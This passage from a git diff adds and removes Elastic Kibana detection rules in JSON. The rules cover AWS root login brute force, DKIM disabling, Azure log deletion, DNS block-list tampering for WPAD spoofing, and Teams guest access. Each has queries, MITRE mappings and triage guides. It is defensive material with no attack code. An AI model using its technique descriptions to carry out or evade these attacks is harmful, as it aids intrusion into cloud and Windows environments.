Compromise\u201d for investigation, containment, and escalation guidance. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs):** Reference runbooks for failed-login response, evidence preservation, and MFA enforcement. \n- **AWS Documentation:** [Tasks that require the root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", + "query": "event.dataset:aws.cloudtrail and \nevent.provider:signin.amazonaws.com and \nevent.action:ConsoleLogin and \naws.cloudtrail.user_identity.type:Root and \nevent.outcome:failure\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4d50a94f-2844-43fa-8395-6afbd5e1c5ef", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "cloud.account.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 211 + }, + "id": "4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_207.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_207.json deleted file mode 100644 index e162c793e21..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_207.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", - "false_positives": [ - "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange DKIM Signing Configuration Disabled\n\nDomainKeys Identified Mail (DKIM) is a security protocol that ensures email authenticity by allowing recipients to verify that messages are sent from authorized servers. Disabling DKIM can expose organizations to email spoofing, where attackers impersonate legitimate domains to conduct phishing attacks. The detection rule identifies when DKIM is disabled in Microsoft 365, signaling potential unauthorized changes that could facilitate persistent threats.\n\n### Possible investigation steps\n\n- Review the audit logs in Microsoft 365 to identify the user or service account associated with the event.action \"Set-DkimSigningConfig\" where o365.audit.Parameters.Enabled is False. This will help determine who or what initiated the change.\n- Check the event.timestamp to establish when the DKIM signing configuration was disabled and correlate this with any other suspicious activities or changes in the environment around the same time.\n- Investigate the event.outcome field to confirm that the action was successful and not a failed attempt, which could indicate a misconfiguration or unauthorized access attempt.\n- Examine the event.provider and event.category fields to ensure that the event is specifically related to Exchange and web actions, confirming the context of the alert.\n- Assess the risk score and severity level to prioritize the investigation and determine if immediate action is required to mitigate potential threats.\n- Look into any recent changes in administrative roles or permissions that could have allowed unauthorized users to disable DKIM signing, focusing on persistence tactics as indicated by the MITRE ATT&CK framework reference.\n\n### False positive analysis\n\n- Routine administrative changes: Sometimes, DKIM signing configurations may be disabled temporarily during routine maintenance or updates by authorized IT personnel. To manage this, establish a process to document and approve such changes, and create exceptions in the monitoring system for these documented events.\n- Testing and troubleshooting: IT teams may disable DKIM as part of testing or troubleshooting email configurations. Ensure that these activities are logged and approved, and consider setting up alerts that differentiate between test environments and production environments to reduce noise.\n- Configuration migrations: During migrations to new email systems or configurations, DKIM may be disabled as part of the transition process. Implement a change management protocol that includes notifying the security team of planned migrations, allowing them to temporarily adjust monitoring rules.\n- Third-party integrations: Some third-party email services may require DKIM to be disabled temporarily for integration purposes. Maintain a list of approved third-party services and create exceptions for these specific cases, ensuring that the security team is aware of and has approved the integration.\n\n### Response and remediation\n\n- Immediately re-enable DKIM signing for the affected domain in Microsoft 365 to restore email authenticity and prevent potential spoofing attacks.\n- Conduct a review of recent administrative activities in Microsoft 365 to identify any unauthorized changes or suspicious behavior that may have led to the DKIM configuration being disabled.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized change and potential risks associated with it.\n- Implement additional monitoring on the affected domain and related accounts to detect any further unauthorized changes or suspicious activities.\n- Review and update access controls and permissions for administrative accounts in Microsoft 365 to ensure that only authorized personnel can modify DKIM settings.\n- Escalate the incident to the organization's incident response team for further investigation and to determine if any additional security measures are necessary.\n- Consider implementing additional email security measures, such as SPF and DMARC, to complement DKIM and enhance overall email security posture.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.Enabled", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "514121ce-c7b6-474a-8237-68ff71672379_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103.json deleted file mode 100644 index 6d977c8be0c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses.", - "false_positives": [ - "Deletion of diagnostic settings may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Diagnostic settings deletion from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Diagnostic Settings Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Diagnostic Settings Deletion\n\nAzure Diagnostic Settings are crucial for monitoring and logging platform activities, sending data to various destinations for analysis. Adversaries may delete these settings to hinder detection and analysis of their activities, effectively evading defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs for successful deletion operations, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and ensuring the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Check the timestamp of the deletion event to determine when the diagnostic settings were removed and correlate this with other security events or alerts around the same time.\n- Investigate the affected resources by identifying which diagnostic settings were deleted and assess the potential impact on monitoring and logging capabilities.\n- Review any recent changes or activities performed by the identified user or service principal to determine if there are other suspicious actions that might indicate malicious intent.\n- Assess the current security posture by ensuring that diagnostic settings are reconfigured and that logging and monitoring are restored to maintain visibility into platform activities.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger the rule. Ensure that maintenance schedules are documented and align with the detected events.\n- Automated scripts or tools used for managing Azure resources might delete diagnostic settings as part of their operation. Review and whitelist these scripts if they are verified as non-threatening.\n- Changes in organizational policy or compliance requirements could lead to legitimate deletions. Confirm with relevant teams if such policy changes are in effect.\n- Test environments often undergo frequent configuration changes, including the deletion of diagnostic settings. Consider excluding these environments from the rule or adjusting the rule to account for their unique behavior.\n- Ensure that any third-party integrations or services with access to Azure resources are reviewed, as they might inadvertently delete diagnostic settings during their operations.\n\n### Response and remediation\n\n- Immediately isolate affected Azure resources to prevent further unauthorized changes or deletions. This may involve temporarily restricting access to the affected subscriptions or resource groups.\n- Review the Azure activity logs to identify the source of the deletion request, including the user account and IP address involved. This will help determine if the action was authorized or malicious.\n- Recreate the deleted diagnostic settings as soon as possible to restore logging and monitoring capabilities. Ensure that logs are being sent to secure and appropriate destinations.\n- Conduct a thorough investigation of the user account involved in the deletion. If the account is compromised, reset credentials, and review permissions to ensure they are appropriate and follow the principle of least privilege.\n- Escalate the incident to the security operations team for further analysis and to determine if additional resources or expertise are needed to address the threat.\n- Implement additional monitoring and alerting for similar deletion activities to ensure rapid detection and response to future attempts.\n- Review and update access controls and policies related to diagnostic settings to prevent unauthorized deletions, ensuring that only trusted and necessary personnel have the ability to modify these settings.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/57bfa0a9-37c0-44d6-b724-54bf16787492_208.json b/packages/security_detection_engine/kibana/security_rule/57bfa0a9-37c0-44d6-b724-54bf16787492_208.json new file mode 100644 index 00000000000..d2ea6915605 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/57bfa0a9-37c0-44d6-b724-54bf16787492_208.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies changes to the DNS Global Query Block List (GQBL), a security feature that prevents the resolution of certain DNS names often exploited in attacks like WPAD spoofing. Attackers with certain privileges, such as DNSAdmins, can modify or disable the GQBL, allowing exploitation of hosts running WPAD with default settings for privilege escalation and lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "DNS Global Query Block List Modified or Disabled", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating DNS Global Query Block List Modified or Disabled\n\nThe DNS Global Query Block List (GQBL) is a security feature in Windows environments that blocks the resolution of specific DNS names, such as WPAD, to prevent attacks like spoofing. Adversaries with elevated privileges can alter or disable the GQBL, enabling them to exploit default settings for privilege escalation. The detection rule monitors registry changes indicating such modifications, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the registry event logs to confirm the specific changes made to the DNS Global Query Block List, focusing on the registry values \"EnableGlobalQueryBlockList\" and \"GlobalQueryBlockList\".\n- Identify the user account associated with the registry change event to determine if the account has elevated privileges, such as DNSAdmins, which could indicate potential misuse.\n- Check for any recent changes in user permissions or group memberships that might have granted the necessary privileges to modify the GQBL.\n- Investigate any other suspicious activities or alerts related to the same user or host around the time of the registry change to identify potential lateral movement or privilege escalation attempts.\n- Correlate the event with network traffic logs to detect any unusual DNS queries or attempts to resolve WPAD or other blocked names, which could suggest exploitation attempts.\n- Review system and security logs for any signs of unauthorized access or other indicators of compromise on the affected host.\n\n### False positive analysis\n\n- Legitimate administrative changes to DNS settings by IT staff can trigger the rule. To manage this, create exceptions for known maintenance windows or authorized personnel making these changes.\n- Automated scripts or software updates that modify DNS settings might be flagged. Identify and whitelist these processes if they are verified as safe and necessary for system operations.\n- Changes made by security tools or network management software that adjust DNS settings for legitimate reasons can be mistaken for threats. Review and exclude these tools from monitoring if they are part of the organization's approved security infrastructure.\n- In environments where WPAD is intentionally used, the absence of \"wpad\" in the GlobalQueryBlockList might be a normal configuration. Document and exclude these cases if they align with the organization's network design and security policies.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further exploitation or lateral movement.\n- Revert any unauthorized changes to the DNS Global Query Block List by restoring the registry settings to their default state, ensuring WPAD and other critical entries are included.\n- Conduct a thorough review of user accounts with elevated privileges, such as DNSAdmins, to identify any unauthorized access or privilege escalation. Revoke unnecessary privileges and reset credentials as needed.\n- Deploy endpoint detection and response (EDR) tools to scan the affected system for additional indicators of compromise or malicious activity, focusing on defense evasion techniques.\n- Monitor network traffic for signs of WPAD spoofing or other related attacks, and implement network segmentation to limit the impact of potential threats.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Update security policies and procedures to include specific measures for monitoring and protecting the DNS Global Query Block List, ensuring rapid detection and response to similar threats in the future.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and registry.data.strings != null and\n(\n (registry.value : \"EnableGlobalQueryBlockList\" and registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.value : \"GlobalQueryBlockList\" and not registry.data.strings : \"wpad\")\n)\n", + "references": [ + "https://cube0x0.github.io/Pocing-Beyond-DA/", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/wpad-spoofing", + "https://www.netspi.com/blog/technical-blog/network-penetration-testing/adidns-revisited/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "57bfa0a9-37c0-44d6-b724-54bf16787492", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 208 + }, + "id": "57bfa0a9-37c0-44d6-b724-54bf16787492_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_207.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_207.json deleted file mode 100644 index 0a3fa0d9638..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_207.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", - "false_positives": [ - "Legitimate files reported by the users" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "O365 Email Reported by User as Malware or Phish", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating O365 Email Reported by User as Malware or Phish\n\nMicrosoft 365's email services are integral to business communication, but they can be exploited by adversaries through phishing or malware-laden emails. Attackers may bypass security measures, reaching users who might unwittingly engage with malicious content. The detection rule leverages user reports of suspicious emails, correlating them with security events to identify potential threats, thus enhancing the organization's ability to respond to phishing attempts and malware distribution.\n\n### Possible investigation steps\n\n- Review the details of the alert triggered by the rule \"Email reported by user as malware or phish\" in the SecurityComplianceCenter to understand the context and specifics of the reported email.\n- Examine the event dataset from o365.audit to gather additional information about the email, such as sender, recipient, subject line, and any attachments or links included.\n- Correlate the reported email with other security events or alerts to identify any patterns or related incidents that might indicate a broader phishing campaign or malware distribution attempt.\n- Check the user's report against known phishing or malware indicators, such as suspicious domains or IP addresses, using threat intelligence sources to assess the credibility of the threat.\n- Investigate the user's activity following the receipt of the email to determine if any actions were taken that could have compromised the system, such as clicking on links or downloading attachments.\n- Assess the effectiveness of current security controls and awareness training by analyzing how the email bypassed existing defenses and was reported by the user.\n\n### False positive analysis\n\n- User-reported emails from trusted internal senders can trigger false positives. Encourage users to verify the sender's identity before reporting and consider adding these senders to an allowlist if they are consistently flagged.\n- Automated system notifications or newsletters may be mistakenly reported as phishing. Educate users on recognizing legitimate automated communications and exclude these sources from triggering alerts.\n- Emails containing marketing or promotional content from known vendors might be reported as suspicious. Train users to differentiate between legitimate marketing emails and phishing attempts, and create exceptions for verified vendors.\n- Frequent reports of emails from specific domains that are known to be safe can lead to unnecessary alerts. Implement domain-based exceptions for these trusted domains to reduce false positives.\n- Encourage users to provide detailed reasons for reporting an email as suspicious, which can help in refining detection rules and reducing false positives over time.\n\n### Response and remediation\n\n- Isolate the affected email account to prevent further interaction with potentially malicious content and to stop any ongoing unauthorized access.\n- Quarantine the reported email and any similar emails identified in the system to prevent other users from accessing them.\n- Conduct a thorough scan of the affected user's device and network for any signs of malware or unauthorized access, using endpoint detection and response tools.\n- Reset the credentials of the affected user account and any other accounts that may have been compromised to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident, providing details of the threat and actions taken, to ensure coordinated response efforts.\n- Review and update email filtering and security policies to address any identified gaps that allowed the malicious email to bypass existing controls.\n- Monitor for any further suspicious activity related to the incident, using enhanced logging and alerting mechanisms to detect similar threats in the future.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", - "references": [ - "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "rule.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.001", - "name": "Spearphishing Attachment", - "reference": "https://attack.mitre.org/techniques/T1566/001/" - }, - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "5930658c-2107-4afc-91af-e0e55b7f7184_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_207.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_207.json deleted file mode 100644 index 0869f42f28d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_207.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", - "false_positives": [ - "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Teams Guest Access Enabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Teams Guest Access Enabled\n\nMicrosoft Teams allows organizations to collaborate with external users through guest access, facilitating communication and teamwork. However, adversaries can exploit this feature to gain persistent access to sensitive environments by enabling guest access without authorization. The detection rule monitors audit logs for specific configurations that indicate guest access has been enabled, helping identify unauthorized changes and potential security breaches.\n\n### Possible investigation steps\n\n- Review the audit logs to confirm the event.action \"Set-CsTeamsClientConfiguration\" was successfully executed with the parameter o365.audit.Parameters.AllowGuestUser set to True.\n- Identify the user account responsible for enabling guest access by examining the event logs for the user ID or account name associated with the action.\n- Check the user's activity history to determine if there are any other suspicious actions or patterns, such as changes to other configurations or unusual login times.\n- Investigate the context of the change by reviewing any related communications or requests that might justify enabling guest access, ensuring it aligns with organizational policies.\n- Assess the potential impact by identifying which teams and channels now have guest access enabled and evaluate the sensitivity of the information accessible to external users.\n- Contact the user or their manager to verify if the change was authorized and necessary, and document their response for future reference.\n\n### False positive analysis\n\n- Legitimate collaboration with external partners may trigger alerts when guest access is enabled for business purposes. To manage this, create exceptions for known and approved external domains or specific projects that require guest access.\n- Routine administrative actions by IT staff to enable guest access for specific teams or channels can be mistaken for unauthorized changes. Implement a process to log and approve such changes internally, and exclude these from triggering alerts.\n- Automated scripts or third-party applications that configure Teams settings, including guest access, might cause false positives. Identify and whitelist these scripts or applications to prevent unnecessary alerts.\n- Changes made during scheduled maintenance windows can be misinterpreted as unauthorized. Define and exclude these time periods from monitoring to reduce false positives.\n\n### Response and remediation\n\n- Immediately disable guest access in Microsoft Teams by updating the Teams client configuration to prevent unauthorized external access.\n- Conduct a thorough review of recent audit logs to identify any unauthorized changes or suspicious activities related to guest access settings.\n- Notify the security team and relevant stakeholders about the potential breach to ensure awareness and initiate further investigation.\n- Revoke any unauthorized guest accounts that have been added to Teams to eliminate potential persistence mechanisms.\n- Implement additional monitoring on Teams configurations to detect any future unauthorized changes to guest access settings.\n- Escalate the incident to the organization's incident response team for a comprehensive investigation and to determine if further containment actions are necessary.\n- Review and update access control policies to ensure that enabling guest access requires appropriate authorization and oversight.", - "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.AllowGuestUser", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "5e552599-ddec-4e14-bad1-28aa42404388_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5f0234fd-7f21-42af-8391-511d5fd11d5c_3.json b/packages/security_detection_engine/kibana/security_rule/5f0234fd-7f21-42af-8391-511d5fd11d5c_3.json deleted file mode 100644 index c573a5f25a7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5f0234fd-7f21-42af-8391-511d5fd11d5c_3.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a high number of failed S3 operations from a single source and account (or anonymous account) within a short timeframe. This activity can be indicative of attempting to cause an increase in billing to an account for excessive random operations, cause resource exhaustion, or enumerating bucket names for discovery.", - "false_positives": [ - "Known or internal account IDs or automation" - ], - "from": "now-6m", - "language": "esql", - "license": "Elastic License v2", - "name": "AWS S3 Bucket Enumeration or Brute Force", - "note": "## Triage and analysis\n\n### Investigating AWS S3 Bucket Enumeration or Brute Force\n\nAWS S3 buckets can be be brute forced to cause financial impact against the resource owner. What makes this even riskier is 